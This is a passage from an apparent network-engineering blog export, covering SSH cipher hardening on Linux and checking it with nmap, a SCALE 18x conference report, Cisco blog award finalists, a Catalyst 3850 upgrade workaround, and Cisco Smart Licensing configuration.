HG1e2UeGOnxyIU9j99+sUq3h5omoxtOd33c7ygyBgghBm+G4rHoD4EsJmejK2/Ai1PsjHIN16EaTAB0Y<br />
MiIFByAYr4/Hr+6ANejxDrFpeY3DDBTvXIcES3S+C/Ch6JEoFVfHufc5ni8OReE7KQhrBctNfhoXvFRO<br />
wITNNyyu/jk1LLDTaLFbL/auw/eXGXlXXerWRFY6HvmAbQannl9wryvy97Hm4LJVO+DtTspwvw4IKrQT<br />
HDMdyXvTI6RMjIlGb/7hiUeFb33wx7sw/DwkgjyUCWh8R8nCEoLfpz7qOchW2/WSj+608m62Eh6WDy5q<br />
qkDpstQRD7AbE2OBtiuYgYJaNJfZ1qhIQXlvtQCTgRRS2TvInnoGg+STD2+lWR5WufgKEO778tNDXt3H<br />
YRSdD2N1YcjXG+y0hB/xjvWSoMkr+G2Btxtm8QPgvXQRe9aFU/kALMBKBJ6Q+rDXr2QbyA7zpDudkAn3<br />
<br />
<h3>
Security Header Enhancements</h3><div style="text-align: left;">For IOS-XE devices, starting with 16.4.1, the Nginx/HTTP headers have the following settings for increased security:</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><div>Nginx – Web user interface - </div><div>Nginx applications take care of the headers for their response. As Web UI is one of the NginX application, it adds the security headers. </div><div><br /></div><div>The three headers are the following:</div><div><br /></div><div><ul style="text-align: left;"><li> X-XSS-Protection: 1; mode=block</li><li> X-Frame-Options: SAMEORIGIN</li><li> X-Content-Type-Options: nosniff</li></ul></div></div><h3><br />
Do the same thing to your Linux Servers</h3>
There is a good chance your organization is running some Linux servers. Out of the box, CentOS/Ubuntu will have several weak ciphers. It's very easy to correct that but you will need root privileges.<br />
<br />
First, we will check what ciphers your server is offering. If the server has a public IP address you can go to https://sshcheck.com and enter the FQDN or the IP address. You will get back a comprehensive report back with suggestions on which items should be disabled.<br />
<br />
If the server is internal you can use nmap's ssh-enum script:
<br />
<pre><code class="html">sudo nmap --script ssh2-enum-algos 192.168.10.239</code></pre>
<br />
This will return a list of the crypto offered by your server.<br />
<br />
<h3>
Update the sshd config file</h3>
The sshd config file is located at /etc/ssh. We need to open it and add the suites we want. First we will make a backup copy.<br />
<br />
<pre><code class="html">sudo cd /etc/ssh
sudo cp sshd_config sshd_config.bak
sudo nano sshd_config</code></pre>
<br />
Add the following (Make sure these fit your company's security policies)<br />
ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr<br />
<br />
macs umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,umac-128@openssh.com,hmac-sha2-256<br />
<br />
KexAlgorithms diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha256,curve25519-sha256,curve25519-sh$<br />
<br />
You can add these anywhere. I put them just below the section<br />
"# Ciphers and keying".<br />
<br />
Press ctrl+x, enter Y to save the file and enter to complete.<br />
<br />
You can use <br />
<pre><code class="html">sudo sshd -t</code></pre>
to verify the changes. If there are no mistakes in the configuration file nothing will be displayed. If there are errors you get a message with the line number where the error occurred.<br />
<br />
You can use <br />
<pre><code class="html">sshd -T</code></pre>
to dump the current ssh configuration.<br />
<br />
Now we just need to restart the ssh daemon;<br />
<pre><code class="html">sudo systemctl restart sshd</code></pre>
<br />
<br />
<h3>
Check your work</h3>
Refresh the sshcheck page or rerun nmap. You should see just the cipher suites you entered. Here is nmap against my server:<br />
<pre><code class="html">nmap --script ssh2-enum-algos -sV -p22 hubbardonnetworking.com</code></pre>
<br />
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-24 22:15 PDT<br />
Nmap scan report for hubbardonnetworking.com (107.170.203.230)<br />
Host is up (0.026s latency).<br />
<br />
PORT STATE SERVICE VERSION<br />
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)<br />
| ssh2-enum-algos: <br />
| kex_algorithms: (6)<br />
| diffie-hellman-group14-sha256<br />
| diffie-hellman-group16-sha512<br />
| diffie-hellman-group18-sha512<br />
| diffie-hellman-group-exchange-sha256<br />
| curve25519-sha256<br />
| curve25519-sha256@libssh.org<br />
| server_host_key_algorithms: (5)<br />
| ssh-rsa<br />
| rsa-sha2-512<br />
| rsa-sha2-256<br />
| ecdsa-sha2-nistp256<br />
| ssh-ed25519<br />
| encryption_algorithms: (6)<br />
| chacha20-poly1305@openssh.com<br />
| aes256-gcm@openssh.com<br />
| aes128-gcm@openssh.com<br />
| aes256-ctr<br />
| aes192-ctr<br />
| aes128-ctr<br />
| mac_algorithms: (5)<br />
| umac-128-etm@openssh.com<br />
| hmac-sha2-256-etm@openssh.com<br />
| hmac-sha2-512-etm@openssh.com<br />
| umac-128@openssh.com<br />
| hmac-sha2-256<br />
| compression_algorithms: (2)<br />
| none<br />
|_ zlib@openssh.com<br />
<br />
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds<br />
<br />
I have a Python script that presents a menu with several nmap security scripts. If you haven't used nmap much it is worth a look.<br />
<br />
<a href="https://github.com/rikosintie/nmap-python">Python tool for nmap scripts</a><br />
<br />
<h3>
References</h3>
<a href="https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/ssh2-default.html">Putty SSH V2</a><br />
<a href="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_ssh/configuration/15-s/sec-usr-ssh-15-s-book/sec-secure-shell-algorithm-ccc.html#concept_9C253BD1B6AC4F10AB86EFC33C7FECA8">SSH Algorithms for Common Criteria Certification</a><br />
<a href="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/https/command/nm-https-cr-book/nm-https-cr-cl-sh.html#wp3059595868">Cisco IOS HTTP Services Command Reference</a><div><a href="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/https/configuration/xe-16-9/https-xe-16-9-book/nm-nginx-http-web-security.html" target="_blank">HTTP Services Configuration Guide, Cisco IOS XE Fuji 16.9.x</a><br />
<a href="https://community.cisco.com/t5/switching/how-do-i-disable-cbc-mode-ciphers/td-p/2742566">How do I disable cbc mode ciphers</a><br />
<a href="https://tools.cisco.com/security/center/resources/next_generation_cryptography">Next Generation Cryptography</a><br />
<a href="https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/">tls ssl cipher hardening</a><br />
<a href="https://cheatsheetseries.owasp.org/cheatsheets/TLS_Cipher_String_Cheat_Sheet.html">OWASP cheatsheets TLS_Cipher_String</a><br />
<a href="https://ciphersuite.info/cs/">ciphersuite strength</a><br />
<a href="https://mwl.io/nonfiction/tools#ssh">The standard reference on SSH, newly revised and updated!</a></div></div>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com2tag:blogger.com,1999:blog-690329124282786689.post-79542862656925190122020-03-08T20:37:00.000-07:002020-03-08T20:37:12.514-07:00Southern California Linux Expo SCALE 18x<div>
</div>
<div>
I missed last year's
Linux Expo because I had the flu. This year I was healthy but several speakers canceled and attendance was down because of the Covid-19 travel restrictions that companies have instituted! </div>
<div>
</div>
<div>
Microsoft was the title sponsor and there were some comments that "it's funny that Microsoft is the title sponsor and now we have virus problems" going around.</div>
<div>
<br /></div>
<div>
Several talks were
canceled but the organizers did a fantastic job of finding new speakers
and pulling off a great event! They had hand sanitizer everywhere and
provided sanitizing wipes if you held the microphone to ask a question
after a talk.</div>
<div>
<br /></div>
<div>
I got to catch up with a former co-worker and even a current customer. I have found that the
"Hallway" track is one of the best parts of a conference and it was
true this year!</div>
<div>
<br /></div>
<div>
If you have <span class="ng" data-ddnwab="1583717550221" data-wpkgv="true">never</span> attended SCALE I highly recommend it. The cost for all four days is only $85
and that includes as many talks as you want to attend, a party on Friday night, a CTF
event all three days and a decent sized Expo floor. </div>
<div>
<br /></div>
<div>
The last two years DC Darknet has been there. They are the group that does the badges for Defcon and their booth is interactive - you can try your hand at lock picking, buy a kit for a Defcon badge and do the soldering at a table beside their booth. If you have never soldered, they will
train you!</div>
<div>
<br /></div>
<div>
There is plenty of SWAG at the vendor booths, I scored "Red Hat" and "Salt stack" ball caps along with lots of stickers and Tee shirts. Even with the low entry fee, SCALE
provides a T-shirt, lanyard, coffee mug and a bag to carry it in!</div>
<div>
<br /></div>
<div>
Saturday's
keynote by Paul Vixie was eye-opening! He discussed DNS over HTTPS and why it will cause more problems than it solves! If they post a
transcript I will add a link to it.</div>
<div>
<br /></div>
<div>
Even with the cancellations, there were
still a lot of talks to attend! I managed to sit in on a <a href="https://securityonion.net/">Security Onion</a> talk that was one of the best talks I have attended anywhere. The founder of the project, Doug Burks, gave the talk and his enthusiasm for the project was contagious! I plan to download the ISO and give it a
good look. I think for smaller companies it is a great tool to secure their network.</div>
<div>
<br /></div>
<div>
I also attended a Security for
Noobs talks. It was very good and generated some interesting questions at the end of the talk. The
speaker posted the presentation <a href="https://www.slideshare.net/slideshow/embed_code/key/lHqx0PYPh7niVy">here</a> </div>
<div>
<br /></div>
<div>
I
had planned to sit in on several embedded Linux talks put on by the
Core Embedded Linux Project of the Linux Foundation. I attend a couple two years ago and they were great! You brought a Beagle Bone Black, compiled a Linux kernel and built a fully functional embedded device.
Unfortunately, the entire track was canceled because of travel restrictions. </div>
<div>
<br /></div>
<div>
I had also planned to attend the Linux Professionals Institute LPIC-1 Preparation Session on Friday but got tied up at work and missed it. I was hoping to take the exam on
Sunday as they offer it for $99! But I was too tired to cram on Friday night and after missing the prep session decided to wait. </div>
<div>
<br /></div>
<div>
Sunday's keynote was from a man named Sha that had been convicted of assault with a firearm and sentenced to 27 years to life. A woman named <a href="https://en.wikipedia.org/wiki/Jessica_McKellar">Jessica McKellar</a> volunteers at San Quentin Prison and teaches Python to the inmates. When Sha's sentence was commuted, she hired him. Sha's presentation was amazing. When the Q&A came up I told Sha that I have heard hundreds for presentations and his was one of the best. I asked him to start a YouTube channel and keep us updated on his progress. I got a large round of applause!</div>
<div>
<br /></div>
All in all, it was a good SCALE!@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-62277172709785073982019-12-08T19:10:00.000-08:002019-12-08T19:10:51.385-08:002019 IT Blog Awards FinalistsCisco is hosting the 2019 IT Blog Awards. Here are the finalists. You can vote by going to <a href="https://www.ciscofeedback.vovici.com/se/705E3ECD18791A68">2019 IT Blog Awards Finalists Voting!</a><br />
<br />
I have only used mrnCCIEW and Clear to Send, and recommend both, but if they made this list they are probably worth a look.<br />
<br />
Best Analysis - Does this blog provide insightful discussions?<br />
<a href="https://www.houmanasefi.com/blog">Houman Asefi</a><br />
<a href="https://howdoesinternetwork.com/">How Does Internet Work</a><br />
<a href="https://mrncciew.com/">mrnCCIEW</a><br />
<a href="https://www.networkdefenseblog.com/blog">Network Defense Blog</a><br />
<a href="http://wirelessnerd.blog/">Wireless Nerd</a><br />
<a href="https://thewlan.com.au/">The WLAN</a><br />
<a href="https://vmiss.net/">vMiss</a><br />
<br />
Best Cert Study Journey - Provides useful insights into the need-to-knows throughout a certification study journey.<br />
<a href="https://brunowollmann.com/">Bruno Wollmann</a><br />
<a href="http://www.ciscoredes.com.br/">Cisco Redes</a><br />
<a href="https://ipcisco.com/">IP Cisco</a><br />
<a href="https://www.labeveryday.com/">Lab Every Day</a><br />
<a href="https://www.networkfuntimes.com/">Network Fun Times</a><a href="https://blog.noblinkyblinky.com/">No Blinky Blinky</a><br />
<a href="https://packitforwarding.com/">Packit Forwarding</a><br />
<br />
Best Newcomer - A great new blog / podcast / etc. started in the last(ish) year.<br />
<a href="http://ciscoworkerbee.wordpress.com/">Cisco Worker Bee</a><br />
<a href="https://dmitrygolovach.com/">Dmitry Golovach</a><br />
<a href="https://giftedlane.com/">Gifted Lane</a><br />
<a href="https://learningnetwork.cisco.com/people/Micheline_Murphy/content">Micheline Murphy</a><br />
<a href="https://www.networkfreestyle.tech/">Network Freestyle</a><br />
<a href="https://neverthenetwork.com/notes">Never the Network</a><br />
<a href="https://pluginsblog.com/">Plugins Blog</a><br />
<br />
Best Podcast or Video Series - Best in content and creativity delivered in the format of videos or podcasts.<br />
<a href="http://ciointheknow.com/">CIO In The Know</a><br />
<a href="http://cleartosend.net/">Clear to Send</a><br />
<a href="https://www.youtube.com/channel/UCsV515HYJNWFvTORWJxI1rg">Madrasa Tech</a><br />
<a href="https://www.youtube.com/user/gomorth">Mario Salinas</a><br />
<a href="https://www.youtube.com/channel/UCjqX6wTMcPIQlkrWoxt2C0g">Network Bruh</a><br />
<a href="https://networkchuck.com/">Network Chuck</a><br />
<a href="https://www.youtube.com/user/TheAskAnsonChannel">The Ask Anson Channel</a><br />
<br />
Most Educational - Shares great tips, tricks, or how-to’s to help you learn something new or further your understanding on a topic.<br />
<a href="https://aboutnetworks.net/">About Networks</a><br />
<a href="https://craigwaters.org/">Craig Waters</a><br />
<a href="http://fkuris.hu/blog/">Ferenc Kuris</a><br />
<a href="https://jorgedelacruz.es/">Jorge De La Cruz</a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-411552218973924262019-09-18T21:09:00.000-07:002019-09-18T21:09:26.212-07:00Signature Verification failed while upgrading a Cisco IOS-XE Based SwitchWhile upgrading some Cisco 3850 switches from 3.6.1 to 3.6.10 I ran into this message:<br /><br />test-sw#software install file flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin new verbose<br />Preparing install operation ...<br />[1]: Starting install operation <br />[1]: Expanding bundle flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin<br />[1]: <span style="color: red;">% Signature Verification failed on cat3k_caa-base.SPA.03.06.10E.pkg. Operation aborted.</span><br />[1]: % Failed to extract consolidated content. Operation aborted.<br />[1]: % An internal error was encountered. Operation aborted.<br /><br />I had verified the .bin file using the “verify /md5 <filename>” command before starting so I knew the file was good. I reloaded the switch and tried again but got the same results. <br /><br />I opened a TAC case and they knew what to do! There is a bug that requires booting into bundle mode, and then manually expanding the .bin file. It’s actually very easy and doesn’t take much longer than the straight upgrade. <br /><br />The bug has been fixed in 3.6.4 so you should only run into this on 3.6.0 to 3.6.3.<br /><br />
<h4>
Check the current boot variable</h4>
test-sw#sh boot<br />---------------------------<br />Switch 1<br />---------------------------<br />Current Boot Variables:<br />BOOT variable does not exist<br /><br />Boot Variables on next reload:<br />BOOT variable = flash:packages.conf<br /><br />Obviously the switch is running install mode because it’s booting from “packages.conf.”<br /><br />
<h4>
List the files in flash</h4>
test-sw#dir<br />Directory of flash:/<br /><br /><span style="font-size: x-small;"><span style="font-family: "Courier New", Courier, monospace;">24242 -rwx 2097152 Sep 11 2019 23:00:03 -07:00 nvram_config<br />24243 -rw- 804 Jun 18 2015 14:28:13 -07:00 vlan.dat<br />24244 -rw- 302112348 Sep 9 2019 21:01:50 -07:00 cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin<br />24251 -rw- 1236 Jun 16 2015 06:51:25 -07:00 packages.conf<br />56561 drwx 4096 Jun 16 2015 06:51:53 -07:00 mnt<br />24252 -rw- 82653508 Jun 16 2015 06:51:13 -07:00 cat3k_caa-base.SPA.03.06.01E.pkg<br />24253 -rw- 6625980 Jun 16 2015 06:51:13 -07:00 cat3k_caa-drivers.SPA.03.06.01E.pkg<br />24254 -rw- 33749996 Jun 16 2015 06:51:13 -07:00 cat3k_caa-infra.SPA.03.06.01E.pkg<br />24255 -rw- 42827072 Jun 16 2015 06:51:13 -07:00 cat3k_caa-iosd-universalk9.SPA.152-2.E1.pkg<br />24256 -rw- 25727884 Jun 16 2015 06:51:13 -07:00 cat3k_caa-platform.SPA.03.06.01E.pkg<br />24257 -rw- 99240768 Jun 16 2015 06:51:14 -07:00 cat3k_caa-wcm.SPA.10.2.111.0.pkg<br />56562 drwx 4096 Aug 14 2019 18:18:34 -07:00 dc_profile_dir<br /><br />1562509312 bytes total (919986176 bytes free)</span></span><br /><br /><br />
<h4>
Verify the .bin file's md5 hash </h4>
test-sw#verify /md5 cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin<br />..........................................................................................................................…<br />Done!<br />verify /md5 (flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin) = ac15e03a732a23e894d3943d667ec168<br /><br />The hash is correct so we can continue.<br />
<br /><br />
<h4>
Set the boot variable to boot the .bin file</h4>
test-sw#conf t<br />test-sw(config)#no boot system <br />test-sw(config)#boot system sw all flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin <br />test-sw(config)#end<br />test-sw#wr mem<br />Building configuration...<br />Compressed configuration from 33642 bytes to 11246 bytes[OK]<br /><br /><br />
<h4>
Check the boot variable</h4>
test-sw#sh boot<br />---------------------------<br />Switch 1<br />---------------------------<br />Current Boot Variables:<br />BOOT variable = flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin;<br /><br />Boot Variables on next reload:<br />BOOT variable = flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin;<br /><br />Note: If you check the boot variable immediately after the wr mem it may still show <br /><br />Boot Variables on next reload:<br />BOOT variable = flash:packages.conf<br /><br />If it does, just wait 10 seconds and try again.<br /><br />
<h4>
Boot into bundle mode</h4>
test-sw#reload<br />Reload command is being issued on Active unit, this will reload the whole stack<br />Proceed with reload? [confirm]<br /><b><br />----------------------After the reload-----------------------------</b><br /><br />
<h4>
Expand the .bin file</h4>
test-sw#software expand file flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin<br />Preparing expand operation ...<br />[1]: Expanding bundle flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin<br />[1]: Copying package files<br />[1]: A different version of provisioning file packages.conf already exists in flash:.<br /> The provisioning file from the expanded bundle will be saved as<br /> flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.conf<br />[1]: Package files copied<br />[1]: Finished expanding bundle flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin<br /><br />
<h4>
Update the packages.conf file</h4>
test-sw#delete flash:packages.conf<br />Delete filename [packages.conf]?<br />Delete flash:/packages.conf? [confirm]<br />test-sw#rename flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.conf packages.conf<br />Destination filename [packages.conf]?<br /><br />
<h4>
Verify that packages.conf contains the 3.6.10 files</h4>
test-sw#more flash:packages.conf<br />#! /usr/binos/bin/packages_conf.sh<br /><br />sha1sum: b844cd3af271a3dd0fcfd90d38bb4f58f8b4f531<br />iso rp 0 0 rp_base cat3k_caa-base.SPA.03.06.10E.pkg<br />iso rp 0 0 rp_infra cat3k_caa-infra.SPA.03.06.10E.pkg<br />iso rp 0 0 rp_platform cat3k_caa-platform.SPA.03.06.10E.pkg<br />iso rp 0 0 rp_iosd cat3k_caa-iosd-universalk9.SPA.152-2.E10.pkg<br />iso rp 0 0 rp_wcm cat3k_caa-wcm.SPA.10.2.200.0.pkg<br />iso rp 0 0 drivers cat3k_caa-drivers.SPA.03.06.10E.pkg<br /><br /><br />
<h4>
Update the Boot Variable for install mode</h4>
test-sw#conf t<br />Enter configuration commands, one per line. End with CNTL/Z.<br />test-sw(config)#no boot system<br />test-sw(config)#boot system flash:packages.conf<br />test-sw(config)#end<br />test-sw#wr mem<br />Building configuration...<br />Compressed configuration from 33566 bytes to 10974 bytes[OK]<br />test-sw#sh boot<br />---------------------------<br />Switch 1<br />---------------------------<br />Current Boot Variables:<br />BOOT variable = flash:packages.conf;<br /><br />Boot Variables on next reload:<br />BOOT variable = flash:packages.conf;<br />Allow Dev Key = yes<br />Manual Boot = no<br />Enable Break = no<br /><br />
<h4>
Reload the switch to boot into 3.6.10</h4>
test-sw#reload<br /><br /><br />
<h4>
Here are the commands ready to paste in:</h4>
sh boot<br />dir<br />verify /md5 cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin<br />conf t<br />no boot system <br />boot system sw all flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin <br />end<br />wr mem<br />sh boot<br />reload<br /><br />software expand file flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.bin<br />delete flash:packages.conf<br />rename flash:cat3k_caa-universalk9.SPA.03.06.10.E.152-2.E10.conf packages.conf<br /><br />more flash:packages.conf<br />conf t<br />no boot system<br />boot system flash:packages.conf<br />end<br />wr mem<br />sh boot@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-14025104917341381462019-08-27T21:18:00.000-07:002019-09-03T10:18:17.191-07:00Configuring Cisco Smart Licensing on the Catalyst PlatformAccording to Cisco Smart Licensing is the future. From the Cisco website:<br />
<br />
<i>"Smart Licensing is a cloud-based, software license management solution that allows you to manage and track the status of your license and hardware and software usage trends. Smart Licensing also enables you to automate time-consuming, manual licensing tasks." </i><br />
<br />
The important statement on the website is this statement:<br />
<br />
<i>"Licenses are managed as smart licenses from Cisco IOS XE Fuji 16.9.1 and later."</i><br />
<br />
That means that as soon as you upgrade to 16.9.1 or later your Right to Use licensing will no longer work. So how do you set up Smart Licensing on the switch?<br />
<br />
It's actually pretty easy but it does require Internet access. You can use a proxy but I am not going to cover that today. If you are building the switches at your office for a customer you can configure the management interface and use your internal network. That is what I am doing in this example. If your switch already has internet access you can skip the management interface configuration.<br />
<br />
<h3>
Set the correct license level</h3>
There will be a printed card in the box with the swiitch that lists the type and quantity of licenses that were purchased. Notice in the picture below that the quantity is 17. That is because there were 17 switches on the sales order.<br />
<br />
Near the bottom is a bar code label "Order #". This is what Cisco calls the Sales Order (SO) number. You will need this if you contact TAC or the licensing team.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6AsPX5-oaeylgGUbkgx3VgPH-2vxRllsJvhv22-ZpRnmOVehlE5JNAy7XmCkEdMLCdXERf-J165gePDFKlD0ZHFQTFRaoYvWzQ61eE8RLbA689Fieq3RrbgLYTeN0jfr7b2Xbmpjurom2/s1600/Cisco-Smart-License.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1294" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6AsPX5-oaeylgGUbkgx3VgPH-2vxRllsJvhv22-ZpRnmOVehlE5JNAy7XmCkEdMLCdXERf-J165gePDFKlD0ZHFQTFRaoYvWzQ61eE8RLbA689Fieq3RrbgLYTeN0jfr7b2Xbmpjurom2/s640/Cisco-Smart-License.png" width="515" /></a></div>
<br />
<br />
My switches were purchased with network-advantage licensing so I entered the code listed below. If you don't do this, the call-home service will try to register DNA Advantage and Network Advantage licenses. It works, but you get an Alert on the CSSM portal and you will see this in the output of "show license all"<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">License Usage<br />==============<br /><br />C9300 48P DNA Advantage (C9300-48 DNA Advantage):<br /> Description: <span style="color: red;">C9300 48P DNA Advantage</span><br /> Count: 4<br /> Version: 1.0<br /> Status: <span style="color: red;">OUT OF COMPLIANCE</span><br /> Export status: NOT RESTRICTED</span></b><br />
<b><br /></b> Enter the following to set the license level to network-advantage<b>.</b> Note that a reload is required.<b><br /></b><br />
<b><br /></b> <b><span style="font-family: "courier new" , "courier" , monospace;">test#Conf </span></b><b><span style="font-family: "courier new" , "courier" , monospace;">t</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">test(config)#license boot level network-advantage</span></b><b><span style="font-family: "courier new" , "courier" , monospace;"> </span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">test(config)#exit</span></b><b><span style="font-family: "courier new" , "courier" , monospace;"> </span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">test#write memory</span></b><b><span style="font-family: "courier new" , "courier" , monospace;"> </span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">test#show version (showing just the relevant output)<br /><br /><span style="font-size: x-small;">Technology Package License Information:<br /><br />------------------------------------------------------------------------------<br />Technology-package Technology-package<br />Current Type Next reboot<br />------------------------------------------------------------------------------<br />network-advantage Smart License network-advantage<br />dna-advantage Subscription Smart License None<br />AIR License Level: AIR DNA Advantage<br />Next reload AIR license Level: AIR DNA Advantage</span></span><span style="font-family: "courier new" , "courier" , monospace;"><span style="font-size: x-small;"></span><br /><br />reload</span></b><br />
<br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-size: small;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "courier new" , "courier" , monospace;">If you purchased additional add ons such as DNA your boot level command will look like this:</span></span></span></span></span></span><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">license boot level network-advantage addon dna-advantage </span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></b>
<br />
<h4>
Configure the Management interface</h4>
I was connecting to a LAN with a DHCP server so I used DHCP. If you don't have access to a DHCP server use a valid static IP address.<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">conf t</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">test(config)#interface GigabitEthernet0/0</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">test(config-if)#ip address dhcp</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">test(config-if)#no shut</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">exit</span></b><br />
<br />
<h4>
Configure routing and host resolution</h4>
Smart Licensing uses the "Call-Home" service and must be able to reach <b>tools.cisco.com</b>. I added a host entry since this customer doesn't allow name servers.<br />
<br />
Since I am using the management interface I had to use the Mgmt-vrf for the host. Once the switch is installed, the management interface will be down so I added a host outside the Mgmt-vrf<br />
<span style="font-size: x-small;"><b><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></b></span> <span style="font-size: small;"><b><span style="font-family: "courier new" , "courier" , monospace;">test(config)#ip host vrf Mgmt-vrf tools.cisco.com 72.163.4.38</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: "courier new" , "courier" , monospace;">test(config)#ip host tools.cisco.com 72.163.4.38</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: "courier new" , "courier" , monospace;">test(config)#ip route vrf Mgmt-vrf 72.163.4.38 255.255.255.255 10.253.4.1</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: "courier new" , "courier" , monospace;">test(config)#ip http client source-interface g0/0</span></b></span><br />
<br />
The "ip http client" statement must be in the configuration while using the management interface. You must remove if you don't use the management interface after install.<br />
<br />
Make sure you can ping tools.cisco.com:<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">ping vrf Mgmt-vrf tools.cisco.com</span></b><br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 72.163.4.38, timeout is 2 seconds:<br />
!!!!!<br />
<br />
<h4>
Configure the Smart Call-Home service</h4>
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(config)#service call-home</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(config)#license smart transport callhome</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(config)#call-home</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(cfg-call-home)#no http secure server-identity-check</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(cfg-call-home)#profile CiscoTAC-1</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(cfg-call-home-profile)#reporting all</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(cfg-call-home-profile)#destination transport-method http</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(cfg-call-home-profile)#no destination transport-method email</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(cfg-call-home-profile)active</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test(cfg-call-home-profile)#end</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>test#wr mem</b></span><br />
<br />
Use show commands to review:<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">sh run | sec call-home<br />service call-home<br />call-home<br /> ! If contact email address in call-home is configured as sch-smart-licensing@cisco.com<br /> ! the email address configured in Cisco Smart License Portal will be used as contact email address to send SCH notifications.<br /> contact-email-addr sch-smart-licensing@cisco.com<br /> no http secure server-identity-check<br /> profile "CiscoTAC-1"<br /> active<br /> destination transport-method http<br /> no destination transport-method email</span></b><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">sh run | i call<br />service call-home<br />call-home<br /> ! If contact email address in call-home is configured as sch-smart-licensing@cisco.com<br />license smart transport callhome</span></b><br />
<br />
<br />
<h3>
Create the Smart Account</h3>
Smart licensing requires a "Smart" account before you can activate the license on the switch. To create your account go to <a href="https://software.cisco.com/#">CSSM.</a><br />
<br />
When the page loads you will see 5 sections. Look for Administration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
